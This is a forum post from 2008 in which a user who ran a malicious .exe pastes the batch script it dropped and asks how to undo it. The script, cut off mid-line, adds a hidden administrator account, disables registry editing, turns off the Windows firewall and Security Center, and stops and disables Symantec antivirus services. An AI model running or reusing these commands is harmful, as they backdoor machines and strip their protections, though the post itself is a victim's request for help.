Go Back   Computer Forums > General Computing > Hardware
Click Here to Login
Join Computer forums Today


Reply
 
Thread Tools Search this Thread Display Modes
 
Old 08-10-2008, 03:04 AM   #1
Beta Member
 
Join Date: Aug 2008
Posts: 1
Default Batch File Reverse

Hey guys, somone sent me this .exe file and it opened a batch file, i used a program to extract the batch file, and this is what it has come up with

net users /add "Username" "Password"
net localgroup Administrators /add "Username"
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t" /v "Username" /t REG_DWORD /d 00000000 /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\policies\Explorer" /v NoViewContextMenu /t REG_DWORD /d 1 /f
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curr entVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
net stop wscsvc

reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ wscsvc" /v Start /t REG_DWORD /d 0x4 /f

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Securit y Center" /v AntiVirusDisableNotify /t REG_DWORD /d 00000001 /f

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Securit y Center" /v FirewallDisableNotify /t REG_DWORD /d 00000001 /f

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Securit y Center" /v UpdatesDisableNotify /t REG_DWORD /d 00000001 /f

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Securit y Center" /v FirewallOverride /t REG_DWORD /d 00000001 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ SharedAccess\Parameters\FirewallPolicy\StandardPro file" /v EnableFirewall /t REG_DWORD /d 00000000 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ SharedAccess\Parameters\FirewallPolicy\StandardPro file" /v DoNotAllowExceptions /t REG_DWORD /d 00000001 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ SharedAccess\Parameters\FirewallPolicy\StandardPro file" /v DisableNotifications /t REG_DWORD /d 00000001 /f

net stop sbservice

net stop "Symantec Core LC"

net stop "ccEvtMgr"

net stop "ccPwdSvc"

net stop "Speed Disk Service"

net stop "NPFMntor"

net stop "NSCService"

reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ navapsvc" /v Start /t REG_DWORD /d 00000004 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ GhostStartService" /v Start /t REG_DWORD /d 00000004 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ NProtectService" /v Start /t REG_DWORD /d 00000004 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ SAVScan" /v Start /t REG_DWORD /d 00000004 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ SBService" /v Start /t REG_DWORD /d 00000004 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ Symantec Core LC" /v Start /t REG_DWORD /d 00000004 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ ccEvtMgr" /v Start /t REG_DWORD /d 00000004 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ ccPwdSvc" /v Start /t REG_DWORD /d 00000004 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ S


What do i do to reverse it? It has disabled reg editing aswell can somone help me write a reverse? Thnx
M4Assault is offline   Reply With Quote
Reply

Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are Off



All times are GMT -5. The time now is 09:23 PM.


Powered by vBulletin® Version 3.8.8 Beta 4
Copyright ©2000 - 2017, vBulletin Solutions, Inc.
Search Engine Friendly URLs by vBSEO 3.6.0